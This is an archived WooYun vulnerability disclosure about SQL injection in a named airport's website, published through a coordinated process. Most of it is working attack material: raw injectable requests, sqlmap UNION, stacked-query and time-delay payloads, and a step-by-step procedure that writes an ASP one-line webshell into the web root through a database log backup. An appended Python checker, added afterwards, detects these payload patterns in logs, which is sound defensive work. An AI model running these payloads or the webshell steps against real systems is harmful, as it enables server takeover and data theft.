
Vulnerability summary

Defect ID: wooyun-2014-060559

Title: Multiple SQL injections at Xi'an Xianyang Airport lead to getshell

Vendor: Xi'an Xianyang International Airport

Author: Kuuki

Submitted: 2014-05-16 16:22

Fix deadline: 2014-06-30 16:23

Published: 2014-06-30 16:23

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-05-16: Details sent to the vendor, awaiting vendor handling
2014-05-21: Vendor confirmed; details disclosed to the vendor only
2014-05-31: Details disclosed to core white hats and domain experts
2014-06-10: Details disclosed to regular white hats
2014-06-20: Details disclosed to intern white hats
2014-06-30: Details disclosed to the public

Brief description:

There is also a shopping site on the same host, and it fell along with this one.

Detailed description:

Injection points (every f_* parameter is injectable):

POST /m/departures.aspx HTTP/1.0
Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55
Content-Length: 128
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.xxia.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxia.com/m/departures.aspx
f_txtFlightNumber=9876543210&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0


sqlmap report

---
Place: POST
Parameter: f_txtFlightNumber
Type: UNION query
Title: Generic UNION query (NULL) - 23 columns
Payload: f_txtFlightNumber=9876543210' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(113)+CHAR(104)+CHAR(66)+CHAR(81)+CHAR(72)+CHAR(75)+CHAR(78)+CHAR(88)+CHAR(112)+CHAR(120)+CHAR(101)+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(105)+CHAR(113)-- &f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: f_txtFlightNumber=9876543210'; WAITFOR DELAY '0:0:5'--&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: f_txtFlightNumber=9876543210' WAITFOR DELAY '0:0:5'--&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
---
[14:31:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008


GETSHELL method:

Log differential backup - 1. Switch the current database to full recovery
<injection point>;alter database db_airport set RECOVERY FULL--+
2. Create the table cmd
<injection point>;create table cmd (a image)--+
3. Back up the current database's log to c:\sql.bak
<injection point>;backup log <current database> to disk = 'c:\sql.bak' with init--+
4. Insert the one-line webshell code into the table cmd
<injection point>;insert into cmd (a) values ('<%execute(request("a"))%>')--+
5. Back up the log containing the one-line code into the site's web root
<injection point>;backup log db_airport to disk = 'E:\wwwroot\website\104.asp'--+
6. Done
<injection point>;drop table cmd--+


[screenshot: 2014-05-13 下午4.12.21.png]


[screenshot: 2014-05-13 下午4.12.33.png]


Shopping site on the same host: http://booking.xxia.com/ (on the same server)
Other injections:

POST /m/arrivals.aspx HTTP/1.0
Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55
Content-Length: 129
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: www.xxia.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxia.com/m/arrivals.aspx
f_txtFlightNumber=9876543210&f_txtDeparture=%E5%87%BA%E5%8F%91%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0


Insert-type:

POST /poll.aspx?q=submit HTTP/1.0
Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55
Content-Length: 649
Accept: */*
Host: www.xxia.com
Content-Type: application/x-www-form-urlencoded
Referer: http://www.xxia.com/poll.aspx
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
h_txt226=%E6%82%A8%E8%AE%A4%E4%B8%BA%E5%92%B8%E9%98%B3%E6%9C%BA%E5%9C%BA%E7%9B%AE%E5%89%8D%E6%9C%80%E9%9C%80%E6%8F%90%E5%8D%87%E7%9A%84%E6%9C%8D%E5%8A%A1%E6%98%AF%EF%BC%9A&txt226=1234&h_txt227=%E6%82%A8%E8%AE%A4%E4%B8%BA%E5%92%B8%E9%98%B3%E6%9C%BA%E5%9C%BA%E5%93%AA%E6%96%B9%E4%BE%BF%E6%9C%8D%E5%8A%A1%E8%AE%A9%E6%82%A8%E6%9C%80%E4%B8%BA%E8%AE%A4%E5%8F%AF%EF%BC%9A&txt227=1234&uname=&uemail=test%40altoromutual.com&uqq=1234&uphone=555-555-5555&item160=201&item60=61&item141=142&item153=165&item161=206&item81=82&item162=211&item111=112&item123=124&item135=136&item147=148&item159=195&item163=216&item63=64&item87=88&item156=180&item164=221&item72=73


Parameter cid:

GET /m/business.aspx?q=shoppinglist&cid=615


Someone else has already uploaded a full-featured webshell to the site; it can also be found in the web backup directory.
Moreover, the server sits on the internal network and is connected to several query interfaces, so the consequences of malicious abuse are easy to imagine.

Proof of vulnerability:

[screenshot: 2014-05-13 下午4.35.30.png]

Fix recommendation:

Filtering
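The fix section is a single word, so as an added example (not part of the original report and not the airport's code) here is a small Python checker that URL-decodes the form parameters of a POST body and flags the indicators visible in the sqlmap output and the getshell steps above: a quote-terminated stacked query, WAITFOR DELAY, UNION ... SELECT, BACKUP ... TO DISK and a trailing comment marker. The sample bodies are constructed and only modelled on the requests in the report; the parameter names f_txtFlightNumber and f_txtTerminus are taken from it. It is meant for reviewing IIS or WAF logs for this class of request; the actual fix remains parameterised queries (SqlParameter in ASP.NET) and a database login without BACKUP or ALTER DATABASE rights.

```python
"""Constructed example: flag form parameters that carry the SQL injection
indicators shown in the sqlmap report (stacked queries, WAITFOR DELAY,
UNION SELECT, BACKUP ... TO DISK, trailing comment). Log-review aid only;
it does not replace parameterised queries."""
import re
from urllib.parse import unquote_plus

# Indicator regexes, applied to each URL-decoded parameter value.
INDICATORS = [
    ("union_select",   re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("stacked_query",  re.compile(r";\s*(?:waitfor|alter|create|insert|backup|drop|exec)\b", re.I)),
    ("waitfor_delay",  re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("backup_to_disk", re.compile(r"\bbackup\s+(?:log|database)\b[^;]*\bto\s+disk\b", re.I)),
    ("comment_tail",   re.compile(r"--\s*$")),
]


def parse_form(body: str) -> dict[str, list[str]]:
    """Split an application/x-www-form-urlencoded body on '&' only and decode both sides.
    Done by hand instead of urllib.parse.parse_qs because older parse_qs versions also
    split on ';', which would hide the stacked-query separator inside a value."""
    params: dict[str, list[str]] = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def analyse_body(body: str) -> dict[str, list[str]]:
    """Return {parameter: [indicator names]} for every parameter matching at least one indicator."""
    findings: dict[str, list[str]] = {}
    for name, values in parse_form(body).items():
        for value in values:
            hits = [label for label, rx in INDICATORS if rx.search(value)]
            if hits:
                merged = findings.setdefault(name, [])
                merged.extend(h for h in hits if h not in merged)
    return findings


def is_suspicious(body: str) -> bool:
    """True when any parameter in the body matched an indicator."""
    return bool(analyse_body(body))


# Constructed sample bodies modelled on the report's requests (not captured traffic).
BENIGN = "f_txtFlightNumber=MU2156&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&x=0&y=0"
STACKED = "f_txtFlightNumber=9876543210'; WAITFOR DELAY '0:0:5'--&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&x=0&y=0"
UNION = "f_txtFlightNumber=9876543210' UNION ALL SELECT NULL,NULL,CHAR(113)%2BCHAR(121)-- &x=0&y=0"
# Placeholder path; the point is the BACKUP ... TO DISK shape, not a real target.
BACKUP = "f_txtFlightNumber=1'; backup log db_airport to disk = 'X:\\placeholder.bak'--&x=0&y=0"

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("stacked", STACKED), ("union", UNION), ("backup", BACKUP)):
        print(f"{label:8s} {analyse_body(body)}")
```

Each hit is reported per parameter, so a reviewer sees which form field carried the payload; for the STACKED sample the result is {"f_txtFlightNumber": ["stacked_query", "waitfor_delay", "comment_tail"]}. Values are decoded before matching, so encoded variants such as %2B for + or %27 for the quote are handled the same as literal ones.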

Copyright notice: please credit the source when reposting. Kuuki@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2014-05-21 14:30

Vendor reply:

CNVD has confirmed and reproduced the reported situation; it has been passed to CNCERT for dispatch to the Shaanxi branch centre for handling.

Latest status:

None yet